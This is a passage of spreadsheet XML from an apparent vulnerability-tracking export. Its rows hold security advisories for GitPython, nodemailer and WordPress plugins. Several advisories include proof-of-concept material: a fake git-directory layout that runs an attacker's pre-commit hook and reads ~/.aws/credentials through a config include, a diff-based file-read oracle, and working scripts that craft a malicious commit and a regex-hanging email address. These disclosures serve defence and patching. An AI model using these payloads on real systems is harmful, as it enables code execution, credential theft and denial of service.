      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>### Summary
`Repo.__init__` decides which directory is the git directory by testing candidate paths in an order that
considers the real `.git` **last**. Two earlier tests can be satisfied by ordinary tracked files. Git
reserves only the literal name `.git`, so `HEAD`, `objects/`, `refs/`, `config`, `gitdir`, `commondir`
and `hooks/` at a repository root are all legal tracked content.
Consequently, after a victim opens or clones an attacker's repository, GitPython resolves `git_dir` to
the **working-tree root** while real git correctly resolves `&lt;root&gt;/.git`. Everything GitPython then
treats as "inside the git directory" is attacker-authored content — including `hooks/`, which it
executes.
### CVE-2026-87817
### Affected code (3.1.59)
The discovery loop in `git/repo/base.py` tests, in order:
1. `git/repo/base.py:299` — `isfile(curpath/gitdir)` **and** `isfile(curpath/commondir)` **and** `isfile(curpath/HEAD)`
2. `git/repo/base.py:320` — `is_git_dir(curpath)`
3. `git/repo/base.py:341` — `dotgit = osp.join(curpath, ".git")` ← the real git dir, considered last
`is_git_dir` (`git/repo/fun.py:60`) requires only that `objects/` and `refs/` are directories and that
`HEAD` is a file; **`HEAD`'s contents are never parsed.** The hook path is resolved from
`index.repo.git_dir` (`git/index/fun.py:73`), i.e. the mis-resolved directory.
### Proof of concept
Requires only `pip install GitPython==3.1.59`. Full script attached as `poc1_rce.py`; it runs entirely
in a temp directory and the payload only writes a marker file.
Attacker repository — four ordinary tracked files at the root:
| path | mode | content |
|---|---|---|
| `gitdir` | 100644 | `.git\n` |
| `commondir` | 100644 | `.git\n` |
| `HEAD` | 100644 | `ref: refs/heads/master\n` |
| `hooks/pre-commit` | **100755** | `#!/bin/sh` + payload |
Victim — two ordinary calls:
```python
repo = git.Repo.clone_from(url, dst)     # or git.Repo(dst)
repo.index.commit("automated commit")    # code execution happens here
```
Observed on the PyPI release 3.1.59 (Linux and Windows):
```
real git says the git dir is : /tmp/.../victim/.git
GitPython says it is         : /tmp/.../victim      &lt;- shadowed
attacker's hook executed     : True
git fsck                     : (clean)
```
The `pre-commit` hook runs at `git/index/base.py:1201`, before `write_tree()`, so it fires even though
the commit later fails.
### Impact
A service that opens or clones an untrusted repository with GitPython — a CI runner building a fork
pull request, a code-scanning/SBOM service, a mirror, a dependency bot, an AI code-review/agent tool —
can be made to:
1. **Execute arbitrary commands** via the tracked `&lt;root&gt;/hooks/pre-commit` when the victim calls
   `index.commit()`.
2. **Read files outside the repository**: the tracked `&lt;root&gt;/config` becomes the repository config and
   is parsed with `merge_includes=True` (`git/repo/base.py:765`), so `[include] path = ~/.aws/credentials`
   discloses the file. (`Repo._config_reader` still defaults `merge_includes=True`, so the hardening
   added in 3.1.59 for `.gitmodules`/GHSA-7833 does not cover this path.)
3. **Write a config file to an attacker-chosen directory** via an absolute tracked `commondir`.
Delivery is silent: `git clone` exits 0, `git fsck` (including `--strict`, and with
`transfer.fsckObjects`/`fetch.fsckObjects=true`) reports nothing, and the clone passes every read-only
probe (`head.commit`, `branches`, `is_dirty()`, `untracked_files`, `iter_commits`) because a tracked
`commondir` of `.git` pins `common_dir` to the real `.git`.
### Threat model / preconditions
- Attacker controls the content of a repository the victim opens or clones with GitPython (public repo,
  fork PR, mirrored dependency).
- For code execution, the victim performs a commit via GitPython's native `index.commit()`. For the
  file-read impact, opening the repo and reading config is enough.
- `GIT_WORK_TREE` is **not** a mitigation — `git_dir` is assigned and the discovery loop breaks before
  the environment is consulted.
- Real git is unaffected; only GitPython mis-resolves the directory.
### Remediation
1. Test `curpath/.git` **before** the `gitdir`/`commondir`/`HEAD` triple and before `is_git_dir(curpath)`.
2. Resolve `hook_path` / `_commit_hook_path` / `_get_validated_reflog_path` through `repo.common_dir`.
3. Containment-check `commondir`/`gitdir` contents before joining (reuse
   `SymbolicReference._get_validated_path`).
4. Validate `HEAD` in `is_git_dir` (require `ref: refs/...` or a 40-hex sha).
5. Pass `merge_includes=False` in `Repo._config_reader` (`git/repo/base.py:765`).
### Note for the maintainers
Commit `406b98e1` (2026-05-31, "respect core.hooksPath for commit hooks") resolved the hook path via
`git rev-parse --git-path`, which is immune because git rediscovers the true `.git`. Commit `9bc287a2`
(2026-07-20) reverted it to avoid an unconditional `rev-parse` dependency — reintroducing the exec step.
Measured at each commit with the healthy-looking layout: `406b98e1` → hook did not fire; `9bc287a2` …
`3.1.59` → hook fired.
### Scope note
Only the **repository-root** case is reported: where a real `.git` exists, git prefers it, and GitPython
does not. A fake git dir in a subdirectory fools real git too, so that variant is out of scope as a
general ecosystem hazard rather than a GitPython defect.
###POC Files :
[poc1_rce.py](https://github.com/user-attachments/files/31388464/poc1_rce.py)
[poc2_file_read.py](https://github.com/user-attachments/files/31388465/poc2_file_read.py)</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F639" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M639" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython 3.1.59 blocks a previously available local-file read path through unsafe git diff options such as -O/--orderfile.
However, the high-level diff API still permits --no-index with the default allow_unsafe_options=False.
--no-index changes the semantics of the paths arguments: instead of repository-relative pathspecs, Git interprets them as arbitrary filesystem paths.
When combined with the still-allowed -I/--ignore-matching-lines option, this creates a content-dependent Boolean oracle over a caller-selected local file.
This was reproduced against the published GitPython 3.1.59 wheel.
The original unsafe-option path is blocked in 3.1.59, while this alternate path remains reachable without setting allow_unsafe_options=True.
### Details
Confirmed API surface:
repo.index.diff(
    None,
    no_index=True,
    I=pattern,
    paths=[baseline_path, target_path],
    create_patch=True,
)
The relevant behavior is:
1. --no-index makes the two values supplied via paths filesystem operands rather than repository pathspecs.
2. -I/--ignore-matching-lines makes Git's result depend on whether the supplied regular expression matches the relevant file content.
3. GitPython exposes the resulting bit through distinguishable behavior:
   - matching condition: normal return with an empty DiffIndex
   - non-matching condition: GitCommandError with exit status 1
An application that forwards attacker-influenced diff options and paths and exposes the success/error distinction can therefore be queried repeatedly to recover a guessable local single-line secret.
The issue was confirmed with the default allow_unsafe_options=False.
The behavior does not require the caller to explicitly opt into GitPython's unsafe-option mode.
Verified intended security boundary:
- GitPython 3.1.58 accepts the earlier -O/--orderfile local-file input path.
- GitPython 3.1.59 rejects that same path with UnsafeOptionError.
- GitPython 3.1.59 still permits the --no-index alternate path described above.
This appears to be an alternate route to the same local-file confidentiality property that the 3.1.59 diff option hardening is intended to protect.
### PoC
A minimal reproducer, controlled extraction demonstrator, proof matrix, and proposed remediation are included in the attached package.
[gitpython-3159-maintainer-evidence.zip](https://github.com/user-attachments/files/31123571/gitpython-3159-maintainer-evidence.zip)
The minimal reproducer creates only temporary researcher-controlled files and demonstrates the following predicate:
correct prefix   -&gt; normal GitPython return
incorrect prefix -&gt; GitCommandError(status=1)
In the controlled extraction test, I generated three independent random single-line values and recovered all three exactly through repeated calls to the GitPython high-level API.
Result: 3/3 recovered.
The extraction harness also installs a Python audit hook that rejects direct Python open() access to the target file during the oracle phase. The content-dependent read is therefore performed by the child git process invoked through GitPython rather than by the reproduction script directly.
Controls were also tested:
- normal repository-scoped diff: no secret disclosure
- same outside paths without --no-index: no arbitrary-filesystem interpretation
- deliberately incorrect predicate: status 1 as expected
Suggested remediation is to classify --no-index as unsafe for the high-level diff API unless the caller explicitly sets allow_unsafe_options=True.
### Impact
Potential impact is disclosure of local files readable by the process running GitPython.
Exploitation requires an embedding application to allow an attacker to influence:
1. the relevant diff options,
2. both path operands, and
3. repeated requests while exposing a distinguishable success/error result.
The demonstrated attack is a blind content oracle rather than a one-request in-band file read. It is particularly applicable to short or structured single-line secrets where the target path and approximate value format are known or guessable.
Confirmed affected release: GitPython 3.1.59.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F640" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M640" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython's `Actor.name_email_regex` regular expression (`git/util.py`, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the `author` or `committer` header of a git commit
object that contains a long string with an unterminated `&lt;` (no matching `&gt;`), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
`.author` or `.committer` for **over two minutes per invocation**, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
---
### Details
**Vulnerable file and line:**
`git/util.py`, line 863:
```python
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
```
This regex is evaluated inside `Actor._from_string()` (line 909) every time
GitPython resolves a commit's `.author` or `.committer` property.
**Full call chain — from public API to vulnerable sink:**
commit.author # any ordinary GitPython API call
└── git/objects/commit.py:917
Commit._deserialize()
└── git/objects/util.py:341
parse_actor_and_date(author_line)
└── git/util.py:909
Actor._from_string(string)
└── Actor.name_email_regex.search(string) ← VULNERABLE
`author_line` is decoded directly from the raw bytes of the git commit object with
**no length limit, character restriction, or timeout** applied at any point before
reaching the regex engine. The same chain is triggered by:
- `commit.author`
- `commit.committer`
- `repo.iter_commits()`
- `repo.blame()`
- Any web service / CI tool that displays or processes commit metadata
**Why this pattern backtracks catastrophically:**
The pattern `(.*) &lt;(.*?)&gt;` contains an unbounded greedy group `(.*)` followed by
a literal space and `&lt;`. When the input is a long string that contains `&lt;` but no
closing `&gt;`, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**
| Author field length (bytes) | Time to resolve `.author` |
|-----------------------------|--------------------------|
| 1,000  | 0.0035 s |
| 5,000  | 0.084 s  |
| 10,000 | 0.341 s  |
| 20,000 | 1.525 s  |
| 40,000 | 5.963 s  |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| **200,000** | **150.488 s** |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 →
80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself
imposes **no practical size limit** on author name fields in the object format.
**How the malicious object reaches a victim:**
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into `.git/objects/`. `git cat-file -t &lt;sha&gt;` confirms
it is a valid `commit` type and git's own read-side tools display it without error.
Only git's write-side tooling (`git commit --author`, `git update-index`,
explicit `git fsck`) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)
- A `.git` directory shipped as a tarball, backup, or zip archive
- A git bundle file
- Any automated mirror or import tool that operates at the object level
---
### PoC
**Environment used for testing:**
- GitPython 3.1.59, installed in editable mode from source (no code modifications)
- Python 3.12.3, git 2.43.0, Ubuntu 24.04
**Script 1 — craft the malicious repository (`craft_malicious_repo.py`):**
```python
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '&lt;'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py &lt;target_dir&gt; &lt;payload_size_bytes&gt;
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;target_dir&gt; &lt;payload_size_bytes&gt;")
        sys.exit(1)
    target_dir, payload_size = sys.argv[1], int(sys.argv[2])
    os.makedirs(target_dir, exist_ok=True)
    run(["git", "init", "--quiet"], cwd=target_dir)
    run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
    run(["git", "config", "user.name", "PoC"], cwd=target_dir)
    with open(os.path.join(target_dir, "README.txt"), "w") as f:
        f.write("GitPython ReDoS PoC repository\n")
    run(["git", "add", "README.txt"], cwd=target_dir)
    tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
    malicious_name = "A" * payload_size
    # Key: author field contains a '&lt;' with no closing '&gt;'
    author_line    = f"author {malicious_name} &lt;unterminated 1691999972 -0700"
    committer_line = "committer PoC &lt;poc@example.com&gt; 1691999972 -0700"
    message        = "ReDoS PoC commit"
    commit_content = (
        f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
    ).encode()
    header     = f"commit {len(commit_content)}\x00".encode()
    store      = header + commit_content
    sha        = hashlib.sha1(store).hexdigest()
    compressed = zlib.compress(store)
    objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(compressed)
    run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
    print(f"Malicious commit sha : {sha}")
    print(f"Payload size         : {payload_size} bytes")
    verify = subprocess.run(
        ["git", "cat-file", "-t", sha],
        cwd=target_dir, capture_output=True, text=True
    )
    print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
    main()
```
**Script 2 — trigger the vulnerability (`trigger_redos.py`):**
```python
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -&gt; Actor.name_email_regex.search().
Usage: python3 trigger_redos.py &lt;repo_dir&gt; &lt;commit_sha&gt;
"""
import sys, time, git
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;repo_dir&gt; &lt;commit_sha&gt;")
        sys.exit(1)
    repo   = git.Repo(sys.argv[1])
    commit = repo.commit(sys.argv[2])
    print("Accessing commit.author — triggers Actor._from_string()...")
    t0     = time.time()
    author = commit.author          # ← this single line causes the hang
    elapsed = time.time() - t0
    print(f"Author name length : {len(author.name)} chars")
    print(f"Elapsed            : {elapsed:.3f} seconds")
    print("RESULT: VULNERABLE" if elapsed &gt; 5 else "RESULT: not triggered")
if __name__ == "__main__":
    main()
```
**Execution and observed output:**
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000
Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de
Payload size : 200000 bytes
git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de
Accessing commit.author — triggers Actor._from_string()...
Author name length : 200014 chars
Elapsed : 150.488 seconds
RESULT: VULNERABLE
**Docker reproduction (fully isolated environment):**
```bash
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update &amp;&amp; apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo &lt;SHA&gt;
```
The `python:3.8-bookworm` base image matches the one used in GitPython's own
`fuzzing/local-dev-helpers/Dockerfile`.
---
### Impact
**Who is affected:**
Any application that uses GitPython to parse commits from a source it does not
fully control. High-risk deployments include:
- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)
  that clone and inspect third-party pull requests — one malicious commit in a PR
  can stall every worker that processes it.
- **Code-hosting or code-review web services** that render commit author information
  — a single crafted push blocks every page render or API response that touches that
  commit's metadata.
- **Security or compliance scanners** that walk repository history across many
  repositories — one crafted object in any repository exhausts a scanner worker.
**Severity of impact:**
A 200 KB author field blocks a process for ~150 seconds per single `.author`
access. When `iter_commits()` or `blame` are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
---
### Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude `&lt;` and `&gt;` from the name
group, removing the ambiguity that forces O(n²) backtracking:
```python
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^&lt;&gt;]*) &lt;([^&lt;&gt;]*)&gt;")
```
Because the name group can no longer itself contain a `&lt;` character, the engine
has exactly one candidate position to try when a closing `&gt;` is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (`Name &lt;email&gt;`) never
contain `&lt;` or `&gt;` in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number
of characters GitPython will attempt to parse in an author/committer line (e.g.
rejecting strings longer than 4096 bytes before passing them to any regex) would
further limit the blast radius of any future ReDoS class in this parser.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87970</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not escape a request-supplied value before reflecting it in an unauthenticated AJAX response that is served as HTML, allowing attackers to execute arbitrary JavaScript in the browser of a visitor who opens a crafted link.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87970</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87973</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not sanitize a conversion name before storing it, nor escape it when rendering the analytics page, allowing users with editor-level access to store JavaScript that executes in the session of a higher-privileged user who views that page.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87973</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89296</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>The Pro Like Button WordPress plugin before 2.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89296</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F644" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M644" s="5" t="inlineStr">
        <is>
          <t>10.0.5</t>
        </is>
      </c>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail.
### Details
The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string.
The join check in `src/addressparser/index.ts`:
```js
const joins =
    prevToken &amp;&amp;
    prevToken.noBreak &amp;&amp;
    parts.length &amp;&amp;
    (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@');
```
The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance.
The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time.
### PoC
Isolated, just the parser (`npm i nodemailer@10.0.3`):
```js
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
```
End to end through mailparser, the remote path (`npm i mailparser@3.9.24`):
```js
const { simpleParser } = require('mailparser');
(async () =&gt; {
  const to = 'a' + '@b(c)'.repeat(130000);
  const eml = `From: a@b.com\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`;
  const s = Date.now();
  await simpleParser(eml);
  console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();
```
Timings measured on 10.0.3:
| Address value | Parse time |
| --- | --- |
| 390 KB | 1.3 s |
| 585 KB | 5.6 s |
| 640 KB | 6.7 s |
| 976 KB | 18 s |
It survives RFC 5322 folding: fold the header at offsets that are a multiple of the atom length and every `)`+`@` junction stays intact, so the payload is a standards-compliant email with lines under 998 octets and still triggers it.
### Impact
Algorithmic-complexity DoS. Node is single threaded, so the block stalls everything else in the process, and a handful of these back to back keeps a service down.
Affected: anything that runs `addressparser` on attacker-controlled input, either the public export directly or address headers built from user input. The unauthenticated remote case is mailparser. 3.9.24 pins nodemailer 10.0.3 and calls the parser on inbound `To`/`From`/`Cc` with no length cap, so any service parsing inbound mail with it can be frozen by a single email.
### Suggested fix
Swap the last two operands so the cheap check runs first:
```js
(prevToken.value !== ')' || token.value.charAt(0) === '@' || parts[parts.length - 1].slice(-1) === '@')
```
Pure boolean commutation, so the parse output is identical. Verified byte for byte on the test inputs, and the full 1276-test suite passes.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90972</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
